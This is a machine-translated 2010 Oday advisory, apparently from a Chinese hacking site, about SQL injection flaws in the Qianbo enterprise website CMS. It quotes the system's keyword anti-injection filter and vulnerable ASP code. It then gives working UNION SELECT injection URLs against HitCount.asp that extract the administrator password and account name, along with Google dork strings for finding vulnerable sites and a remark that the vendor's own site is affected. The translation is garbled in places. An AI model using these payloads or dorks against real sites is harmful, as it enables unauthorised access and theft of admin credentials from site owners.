Thousand Bo enterprise website management system Oday-vulnerability warning-the black bar safety net

2010-04-20T00:00:00
ID MYHACK58:62201026766
Type myhack58
Reporter 佚名
Modified 2010-04-20T00:00:00

Description

Program have joined the anti-injection code, in NoSql. asp file 7kccopyd-code

<% If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr Fy_In = "’|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare" Fy_Inf = Split(Fy_In, "|") If Request. Form<>"" Then For Each Fy_Post In The Request. Form For Fy_Xh = 0 To UBound(Fy_Inf) If InStr(LCase(Request. Form(Fy_Post)), Fy_Inf(Fy_Xh))<>0 Then Response. Write "<Script Language=’JavaScript’>alert(’warning: parameters of the illegal!’);& lt;/Script>" Response. End End If Next Next End If

If Request. QueryString<>"" Then For Each Fy_Get In The Request. QueryString For Fy_Xh = 0 To UBound(Fy_Inf) If InStr(LCase(Request. QueryString(Fy_Get)), Fy_Inf(Fy_Xh))<>0 Then Response. Write "<Script Language=’JavaScript’>alert(’warning: parameters of the illegal!’);& lt;/Script>" Response. End Response. End End If Next Next End If End If %>

No filtering cookies, but the program in the variable passed when the limit of integer type, so I have no idea.

Continue to to see.

MemberLogin. Asp this file

Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, sql LoginName = Trim(request. Form("LoginName")) LoginPassword = Md5(request. Form("LoginPassword")) Set rs = server. CreateObject("adodb. recordset") sql = "select * from Qianbo_Members where MemName=’"&LoginName&"’"

Did not join the anti-injection code, but the login verification page, if it is a MSsql database we okay to do points.

This time, in the HitCount. Asp this file is found, the file is not called anti-injection code

<% Dim rs, m_SQL Dim m_id correspondence between m_id correspondence between = ReplaceBadChar(Request. QueryString("id")) m_LX = ReplaceBadChar(Request. QueryString("LX")) action = ReplaceBadChar(Request. QueryString("action")) If action = "count" Then conn. Execute("update "&amp; m_LX&" set ClickNumber = ClickNumber + 1 where ID=" & m_id correspondence between & "") Else m_SQL = "select ClickNumber from "&amp; m_LX&" where ID=" & m_id correspondence between Set rs = conn. Execute(m_SQL) response. Write "document. write("&rs(0)&");" rs. Close Set rs = Nothing End If %>

This is the file. We constructed the injection statement As follows: http://127.0.0.1/hitcount.asp?lx=Qianbo_about&id=1%20and%2 0 1=2%20union%20select%20password%20from%20qianbo_admin to obtain the management password

http://127.0.0.1/hitcount.asp?lx=Qianbo_about&id=1%20and%2 0 1=2%20union%20select%20adminname%20from%20qianbo_admin To obtain the management account

Keywords: inurl:Search. Asp? Range=Product&Keyword= inurl:ProductBuy. Asp? ProductNo=

The official website also have this problem, pass to kill.